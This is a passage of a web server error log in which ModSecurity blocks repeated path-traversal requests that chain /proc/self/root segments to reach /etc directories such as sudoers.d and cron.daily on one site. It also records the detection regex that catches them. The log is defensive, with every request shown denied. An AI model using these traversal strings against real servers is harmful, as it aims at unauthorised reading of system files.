"abqED-oXxyEfFpUF8f9QrwAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:53:15.036757 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.241.31:43746] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqEG9Y0UrI5A3LftIx_7wAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:53:24.231513 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:40928] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqEJPu8EFLIOrSqIpvnxwAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:53:35.758052 2026] [mime_magic:error] [pid 29882:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:53706] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:53:45.467343 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.243.128:59326] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqEOew_le52K8_3pV3B5AAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:54:16.761785 2026] [mime_magic:error] [pid 31803:tid 140411641214720] (70014)End of file found: [client 57.141.18.122:56102] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:54:41.819855 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:46680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqEccdf6f5d65gmYZS2MQAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:55:04.639428 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.241.31:46692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqEiMdf6f5d65gmYZS2QAAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:55:29.895064 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:60958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqEoeyqAr6etmhZHNqfMwAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:55:34.787363 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:34240] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqEpuoXxyEfFpUF8f9RTwAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:55:37.578732 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:36194] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqEqdY0UrI5A3LftIyAdwAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:55:44.154915 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:50514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqEsMdf6f5d65gmYZS2XQAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:55:46.937565 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:41772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqEsda6ubjKNq_cu4Z6CQAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:56:12.367162 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.241.31:48108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqEzPu8EFLIOrSqIpvoZwAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:56:15.147021 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:40976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqEz8df6f5d65gmYZS2hgAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Wed Mar 18 07:56:27.815973 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:37998] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqE29a6ubjKNq_cu4Z6HAAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:56:34.131095 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.241.31:46360] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqE4vu8EFLIOrSqIpvobQAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:56:49.685913 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.241.31:46362] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqE8UzinOy1jxa1j4f0-wAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:57:26.709906 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.243.128:44256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqFFuw_le52K8_3pV3CuQAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:57:35.227497 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:35368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqFHymAPhZkrhU8w4lQTgAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 07:57:47.623790 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.243.128:40454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqFKimAPhZkrhU8w4lQWgAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:58:38.523556 2026] [mime_magic:error] [pid 26799:tid 140411725141760] (70014)End of file found: [client 57.141.18.17:37214] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:58:39.651940 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.241.31:50416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqFX9Y0UrI5A3LftIyBTwAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:59:11.833257 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.243.128:49618] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqFfymAPhZkrhU8w4lQsAAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:00:55.351180 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:55400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqF59a6ubjKNq_cu4Z60wAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
